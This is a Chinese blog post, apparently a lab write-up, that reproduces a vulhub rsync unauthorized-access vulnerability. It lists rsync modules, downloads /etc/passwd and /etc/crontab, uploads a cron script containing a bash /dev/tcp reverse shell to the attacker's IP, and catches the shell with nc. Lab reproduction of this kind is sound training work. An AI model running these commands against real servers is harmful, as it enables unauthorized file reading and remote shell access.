美文网首页
vulhub之rsync未授权访问漏洞复现&利用

vulhub之rsync未授权访问漏洞复现&利用

作者: Leena_c9a7 | 来源:发表于2021-09-30 18:11 被阅读0次

    0x00 前言

    最近几天遇到了一些rsync未授权访问的漏洞,然后自己也不是很熟悉,正好vulhub靶场里面有,而且最后会有反弹shell的内容我也没太熟悉,所以感觉是个很好的机会可以一并学习。嗯嗯我可以!(我真的是太菜了呀)

    0x01 环境

    起docker。切进目录cd vulhub/rsync/common
    然后起服务。

    sudo docker-compose build
    sudo docker-compose up -d
    

    我之前起过,然后再起的时候遇到了run之后直接自己关掉的情况,就关掉重新开了,关掉的命令应该是sudo docker-compose down
    靶机ip:10.222.100.117 MAC
    攻击机ip:10.211.55.3 kali

    0x02 复现

    环境启动后,开始在kali上边操作,首先用rsync命令访问一哈:

    rsync rsync://your-ip:873/
    
    rsync访问.png

    真不错,看到有两个模块,那我们先看看src里面有什么

    rsync rsync://10.222.100.117:873/src
    
    图片.png

    看起来东西不少,而且像是一个Linux根目录,那我们看看能不能把etc/passwd下载下来。

    rsync -av rsync://10.222.100.117:873/src/etc/passwd 1.txt
    

    这个命令是把etc/passwd里的内容下载到我当前目录的 1.txt里面了,看看内容


    图片.png

    看到已经下载下来了,那我们上传一个shell把它放在一个定时任务里面,然后nc等到反弹shell就可以成功了。

    接下来,切到定时任务的目录下,把它的配置文件下载下来。
    rsync -av rsync://10.222.100.117:873/src/etc/crontab crontab.txt

    图片.png
    看看内容,这句话的意思是,每17分钟执行一次/etc/cron.hourly这个命令
    图片.png
    写入shell任意文件 vim写就可以
    #!/bin/bash
    /bin/bash -i >& /dev/tcp/10.211.55.3/4444 0>&1
    

    写完是这样的

    图片.png
    然后把shell上传
    图片.png
    然后nc监听端口
    nc -nvv -lp 4444
    每小时第17分钟执行,反弹shell成功。
    图片.png
    当然也可以,修改定时的时间,比如改成在2分的时候执行。
    这个需要在靶机上
    docker ps
    
    sudo docker exec -it 4ff06ed20a8b -bash
    
    图片.png

    然后vim更改,应该需要安装vim的
    命令是

    apt-get update
    apt-get install vim
    vim crontab
    

    把时间改成你想要的时间



    然后等待时间的到来, 反弹shell成功。

    相关文章

      网友评论

          本文标题:vulhub之rsync未授权访问漏洞复现&利用

          本文链接:https://www.haomeiwen.com/subject/sbuenltx.html